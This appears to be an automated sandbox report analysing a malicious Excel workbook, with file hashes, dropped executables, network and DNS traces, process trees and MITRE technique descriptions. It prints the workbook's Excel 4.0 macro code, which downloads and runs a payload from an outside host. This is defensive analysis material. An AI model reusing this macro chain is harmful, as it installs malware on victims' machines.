SHA-256:	BA0AB47EA8285A45E0884C5916C7C3052BE3C5245A0FC350DF4E83B91BC2A3F5
SHA-512:	075F04CF77A30D166E9C04A6376629508A854F9218CEA194EC1D69A65669C51F3A0858697F258AF0DF5954DE02C7EEF2D060B6F69D8194D4D4A95D2C94900DAE
Malicious:	true
Preview:	.pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\msdownld.tmp\AS01A87F.tmp\victory.php Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	742003
Entropy (8bit):	4.747274159794167
Encrypted:	false
SSDEEP:	6144:Gb6aZQWqNNmRTKHkZnmHgl1gW9oLeN53f9Pa3JLkK9BOsJ:Gb6afqNNmRnZn79oKpCZL99h
MD5:	DC74FAE0ADA0A2426E77588E3797E040
SHA1:	956EB4FACF7A5BD5E35CFE97898B1D17FEC2643D
SHA-256:	C9AF52899F8EE20E384DE482B81CE82826AF9573C4A1A9C9B761B9C5126B2BB7
SHA-512:	6C4A2786E391D3B23495D2159C56D4C8A49EAC0D18F1FAF4820A1D4CF9C93A5DFEE01DE0D0FE5D9D302F8527061B55B34D650AD3C4704CD98D9962BA3E9603E2
Malicious:	true
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...<..`.........."..................8.........@............................. ............`.................................................8Y..(............... ....9..h.......@....X..................................0...........p[...............................text............................... ..`.rdata..4...........................@..@.data...`6...........h..............@....pdata.. ............t..............@..@.00cfg..(...........................@..@.gehcont............................@..@_RDATA..............................@..@.reloc..@...........................@..B.................~....}.}~.x}..x.x.~}~.~....x.~..x.~.~}x...x...x.x..x.~..w..~...........}.}.}.}...}...}..x..}..~.~.....}x....x.....}.......}.}x.~...~.~...~.}.......}..~.~x......}..}..x.~....x.....x..x.}......}........x.}.}~....~.....}.....~}~...........~..

C:\otrgh\sdgvjk\fdcbn.exe Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1483998
Entropy (8bit):	4.747294045359185
Encrypted:	false
SSDEEP:	12288:Gb6afqNNmRnZn79oKpCZL99hNb6afqNNmRnZn79oKpCZL99h:haCNNoZn79odL5AaCNNoZn79odL5
MD5:	5F8F3F845956C9F1626A266B1A6A1B59
SHA1:	511BAAE261FC8616B208E267172C9E243E536594
SHA-256:	0F1C8D24AD9940ACE82975D7ECA8778E8A9010153E64DF4414A6489D05833B87
SHA-512:	916835E296FB4870E893042AEFF6621AF2464C5043FE05D2A818CA4C0E2A4C57F096FF3C8207A35F30628072E97A6F7DF4EB03E97BCFCF6B1984E02F43DEE76F
Malicious:	true
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...<..`.........."..................8.........@............................. ............`.................................................8Y..(............... ....9..h.......@....X..................................0...........p[...............................text............................... ..`.rdata..4...........................@..@.data...`6...........h..............@....pdata.. ............t..............@..@.00cfg..(...........................@..@.gehcont............................@..@_RDATA..............................@..@.reloc..@...........................@..B.................~....}.}~.x}..x.x.~}~.~....x.~..x.~.~}x...x...x.x..x.~..w..~...........}.}.}.}...}...}..x..}..~.~.....}x....x.....}.......}.}x.~...~.~...~.}.......}..~.~x......}..}..x.~....x.....x..x.}......}........x.}.}~....~.....}.....~}~...........~..

Static File Info

General
File type:	Microsoft Excel 2007+
Entropy (8bit):	7.272059464538998
TrID:	Excel Microsoft Office Open XML Format document (40004/1) 83.33% ZIP compressed archive (8000/1) 16.67%
File name:	request_form_1611565093.xlsm
File size:	17535
MD5:	9c47eef4c66e4587ecddb55cfc3ef1e6
SHA1:	da444ad39f513282d1918beceadc0ceb6edc0d3d
SHA256:	042b7d9208258a1a64b9a1ab0079e1bb7898a3b787167457951b810e9b126dd1
SHA512:	37d43fadd6bb4274c15f5c4c339b00d961f7fdd1590e1a05e24bc4564118cdedc5bdd349b984fba8402b3801b57b440d7a152ac94e573351c2a2fb2d57877099
SSDEEP:	384:rdUK4U2aGcIrbnqtcwiMEO81+dAM3SbTz:ZUVaGcIrbnyviMR81+yj
File Content Preview:	PK..........!.................[Content_Types].xml ...(.....................!!..................................................................................................................................................................................

File Icon


Icon Hash:	74ecd0e2f696908c

Static OLE Info

General
Document Type:	OpenXML
Number of OLE Files:	1

OLE File "request_form_1611565093.xlsm"

Indicators
Has Summary Info:
Application Name:
Encrypted Document:
Contains Word Document Stream:
Contains Workbook/Book Stream:
Contains PowerPoint Document Stream:
Contains Visio Document Stream:
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:

Macro 4.0 Code

,,,,,,,,,,,,,,,,,,,,,=RUN(V2),,,,,,,,,,,,,,,,,,,,,,,,,,=HALT(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL('Doc2'!AA15&'Doc2'!AA16,'Doc2'!AB15&'Doc2'!AB16&'Doc2'!AB17,""JCJ"",'Doc2'!AD15,0)",,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL('Doc2'!AA19&'Doc2'!AA20,'Doc2'!AB19&'Doc2'!AB20&'Doc2'!AB21,""JCJ"",'Doc2'!AD15&'Doc2'!AD19,0)",,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL('Doc2'!AA23&'Doc2'!AA24,'Doc2'!AB23&'Doc2'!AB24&'Doc2'!AB25,""JJCCJJ"",0,A60,'Doc2'!AD15&'Doc2'!AD19&'Doc2'!AD23,0,0)",,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL(""INSENG"",""DownloadFile"",""BCCJ"",A60,'Doc2'!AD15&'Doc2'!AD19&'Doc2'!AD23,1)",,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL('Doc2'!AA27&'Doc2'!AA28,'Doc2'!AB27&'Doc2'!AB28&'Doc2'!AB29,""JJCCCCJJ"",0,'Doc2'!AD27,'Doc2'!AD15&'Doc2'!AD19&'Doc2'!AD23,,0,0)",,,,,,,,,,,,,,,,,,,,,,,,,,=RUN(V1),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,https://japort.com/suret/victory.php,,,,,,,,,,,,,,,,,,,,,,,,,,

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 25, 2021 10:23:32.070090055 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:32.227945089 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:32.228055954 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:32.228924990 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:32.386797905 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:32.390645981 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:32.390700102 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:32.390722990 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:32.390734911 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:32.390758038 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:32.390782118 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:32.401439905 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:32.559773922 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:32.559885025 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:32.560631037 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:32.759342909 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.171098948 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.171173096 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.171221972 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.171263933 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.171300888 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.171334982 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.171339035 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.171370029 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.171407938 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.171418905 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.171447992 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.171485901 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.171487093 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.171541929 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.171597958 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.329364061 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.329463005 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.329500914 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.329540968 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.329580069 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.329617023 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.329654932 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.329691887 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.329739094 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.329780102 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.329817057 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.329854012 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.329854012 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.329893112 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.329909086 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.329931974 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.329932928 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.329971075 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.329981089 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.330007076 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.330010891 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.330039978 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.330061913 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.330076933 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.330105066 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.330123901 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.330144882 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.330162048 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.330184937 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.330203056 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.330245018 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.487833023 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.487871885 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.487919092 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.487963915 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.488004923 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.488032103 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.488044977 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.488064051 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.488070011 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.488074064 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.488089085 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.488095045 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.488128901 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.488157034 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.488169909 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.488181114 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.488212109 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.488225937 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.488260031 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.488262892 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.488302946 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.488312006 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.488341093 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.488353968 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.488379955 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.488399029 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.488418102 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.488440990 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.488456011 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.488470078 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.488495111 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.488524914 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.488533020 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.488547087 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.488581896 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.488586903 CET	49722	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:33.488626957 CET	443	49722	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:33.488663912 CET	443	49722	50.87.232.245	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 25, 2021 10:23:17.652827024 CET	60100	53	192.168.2.3	8.8.8.8
Jan 25, 2021 10:23:17.678745031 CET	53	60100	8.8.8.8	192.168.2.3
Jan 25, 2021 10:23:18.710175037 CET	53195	53	192.168.2.3	8.8.8.8
Jan 25, 2021 10:23:18.733675003 CET	53	53195	8.8.8.8	192.168.2.3
Jan 25, 2021 10:23:19.509645939 CET	50141	53	192.168.2.3	8.8.8.8
Jan 25, 2021 10:23:19.535758972 CET	53	50141	8.8.8.8	192.168.2.3
Jan 25, 2021 10:23:21.218935013 CET	53023	53	192.168.2.3	8.8.8.8
Jan 25, 2021 10:23:21.242017984 CET	53	53023	8.8.8.8	192.168.2.3
Jan 25, 2021 10:23:25.692101002 CET	49563	53	192.168.2.3	8.8.8.8
Jan 25, 2021 10:23:25.723529100 CET	53	49563	8.8.8.8	192.168.2.3
Jan 25, 2021 10:23:27.922821045 CET	51352	53	192.168.2.3	8.8.8.8
Jan 25, 2021 10:23:27.946186066 CET	53	51352	8.8.8.8	192.168.2.3
Jan 25, 2021 10:23:28.776576996 CET	59349	53	192.168.2.3	8.8.8.8
Jan 25, 2021 10:23:28.799781084 CET	53	59349	8.8.8.8	192.168.2.3
Jan 25, 2021 10:23:29.154397964 CET	57084	53	192.168.2.3	8.8.8.8
Jan 25, 2021 10:23:29.198488951 CET	53	57084	8.8.8.8	192.168.2.3
Jan 25, 2021 10:23:29.557542086 CET	58823	53	192.168.2.3	8.8.8.8
Jan 25, 2021 10:23:29.602792025 CET	53	58823	8.8.8.8	192.168.2.3
Jan 25, 2021 10:23:30.569367886 CET	58823	53	192.168.2.3	8.8.8.8
Jan 25, 2021 10:23:30.601056099 CET	53	58823	8.8.8.8	192.168.2.3
Jan 25, 2021 10:23:31.566653013 CET	58823	53	192.168.2.3	8.8.8.8
Jan 25, 2021 10:23:31.598356009 CET	53	58823	8.8.8.8	192.168.2.3
Jan 25, 2021 10:23:31.941112995 CET	57568	53	192.168.2.3	8.8.8.8
Jan 25, 2021 10:23:32.064635038 CET	50540	53	192.168.2.3	8.8.8.8
Jan 25, 2021 10:23:32.068098068 CET	53	57568	8.8.8.8	192.168.2.3
Jan 25, 2021 10:23:32.090655088 CET	53	50540	8.8.8.8	192.168.2.3
Jan 25, 2021 10:23:32.839071035 CET	54366	53	192.168.2.3	8.8.8.8
Jan 25, 2021 10:23:32.871134043 CET	53	54366	8.8.8.8	192.168.2.3
Jan 25, 2021 10:23:33.582461119 CET	58823	53	192.168.2.3	8.8.8.8
Jan 25, 2021 10:23:33.615036964 CET	53	58823	8.8.8.8	192.168.2.3
Jan 25, 2021 10:23:33.621869087 CET	53034	53	192.168.2.3	8.8.8.8
Jan 25, 2021 10:23:33.644891977 CET	53	53034	8.8.8.8	192.168.2.3
Jan 25, 2021 10:23:34.401454926 CET	57762	53	192.168.2.3	8.8.8.8
Jan 25, 2021 10:23:34.424726963 CET	53	57762	8.8.8.8	192.168.2.3
Jan 25, 2021 10:23:37.598787069 CET	58823	53	192.168.2.3	8.8.8.8
Jan 25, 2021 10:23:37.632719994 CET	53	58823	8.8.8.8	192.168.2.3
Jan 25, 2021 10:23:48.440037012 CET	55435	53	192.168.2.3	8.8.8.8
Jan 25, 2021 10:23:48.474277973 CET	53	55435	8.8.8.8	192.168.2.3
Jan 25, 2021 10:23:49.945501089 CET	50713	53	192.168.2.3	8.8.8.8
Jan 25, 2021 10:23:49.971278906 CET	53	50713	8.8.8.8	192.168.2.3
Jan 25, 2021 10:23:53.134165049 CET	56132	53	192.168.2.3	8.8.8.8
Jan 25, 2021 10:23:53.169868946 CET	53	56132	8.8.8.8	192.168.2.3
Jan 25, 2021 10:24:04.506521940 CET	58987	53	192.168.2.3	8.8.8.8
Jan 25, 2021 10:24:04.538395882 CET	53	58987	8.8.8.8	192.168.2.3
Jan 25, 2021 10:24:05.715949059 CET	56579	53	192.168.2.3	8.8.8.8
Jan 25, 2021 10:24:05.739253044 CET	53	56579	8.8.8.8	192.168.2.3
Jan 25, 2021 10:24:07.536834002 CET	60633	53	192.168.2.3	8.8.8.8
Jan 25, 2021 10:24:07.559916019 CET	53	60633	8.8.8.8	192.168.2.3
Jan 25, 2021 10:24:07.915107965 CET	61292	53	192.168.2.3	8.8.8.8
Jan 25, 2021 10:24:07.938407898 CET	53	61292	8.8.8.8	192.168.2.3
Jan 25, 2021 10:24:10.855686903 CET	63619	53	192.168.2.3	8.8.8.8
Jan 25, 2021 10:24:10.887474060 CET	53	63619	8.8.8.8	192.168.2.3
Jan 25, 2021 10:24:14.139369011 CET	64938	53	192.168.2.3	8.8.8.8
Jan 25, 2021 10:24:14.162503958 CET	53	64938	8.8.8.8	192.168.2.3
Jan 25, 2021 10:24:23.875736952 CET	61946	53	192.168.2.3	8.8.8.8
Jan 25, 2021 10:24:23.901622057 CET	53	61946	8.8.8.8	192.168.2.3
Jan 25, 2021 10:24:25.316063881 CET	64910	53	192.168.2.3	8.8.8.8
Jan 25, 2021 10:24:25.350987911 CET	53	64910	8.8.8.8	192.168.2.3
Jan 25, 2021 10:24:52.973000050 CET	52123	53	192.168.2.3	8.8.8.8
Jan 25, 2021 10:24:52.999141932 CET	53	52123	8.8.8.8	192.168.2.3
Jan 25, 2021 10:25:11.114424944 CET	56130	53	192.168.2.3	8.8.8.8
Jan 25, 2021 10:25:11.162878990 CET	53	56130	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 25, 2021 10:23:31.941112995 CET	192.168.2.3	8.8.8.8	0x900b	Standard query (0)	japort.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jan 25, 2021 10:23:32.068098068 CET	8.8.8.8	192.168.2.3	0x900b	No error (0)	japort.com		50.87.232.245	A (IP address)	IN (0x0001)
Jan 25, 2021 10:24:07.559916019 CET	8.8.8.8	192.168.2.3	0x9a90	No error (0)	prda.aadg.msidentity.com	www.tm.a.prd.aadg.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Jan 25, 2021 10:23:32.390734911 CET	50.87.232.245	443	192.168.2.3	49722	CN=cpanel.japort.com CN=R3, O=Let's Encrypt, C=US	CN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Mon Dec 14 09:07:11 CET 2020 Wed Oct 07 21:21:40 CEST 2020	Sun Mar 14 09:07:11 CET 2021 Wed Sep 29 21:21:40 CEST 2021	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	37f463bf4616ecd445d4a1937da06e19
Jan 25, 2021 10:23:32.390734911 CET	50.87.232.245	443	192.168.2.3	49722	CN=R3, O=Let's Encrypt, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Wed Oct 07 21:21:40 CEST 2020	Wed Sep 29 21:21:40 CEST 2021		37f463bf4616ecd445d4a1937da06e19

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 4640 Parent PID: 792

General

Start time:	10:23:27
Start date:	25/01/2021
Path:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Imagebase:	0x8e0000
File size:	27110184 bytes
MD5 hash:	5D6638F2C8F8571C593999C58866007E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: fdcbn.exe PID: 4872 Parent PID: 4640

General

Start time:	10:23:35
Start date:	25/01/2021
Path:	C:\otrgh\sdgvjk\fdcbn.exe
Wow64 process (32bit):	false
Commandline:	'C:\otrgh\sdgvjk\fdcbn.exe'
Imagebase:	0x7ff7645b0000
File size:	742003 bytes
MD5 hash:	DC74FAE0ADA0A2426E77588E3797E040
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Analysis Process: fdcbn.exe PID: 5384 Parent PID: 4872

General

Start time:	10:23:41
Start date:	25/01/2021
Path:	C:\otrgh\sdgvjk\fdcbn.exe
Wow64 process (32bit):	false
Commandline:	'C:\otrgh\sdgvjk\fdcbn.exe'
Imagebase:	0x7ff7645b0000
File size:	742003 bytes
MD5 hash:	DC74FAE0ADA0A2426E77588E3797E040
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Data loss prevention, File monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

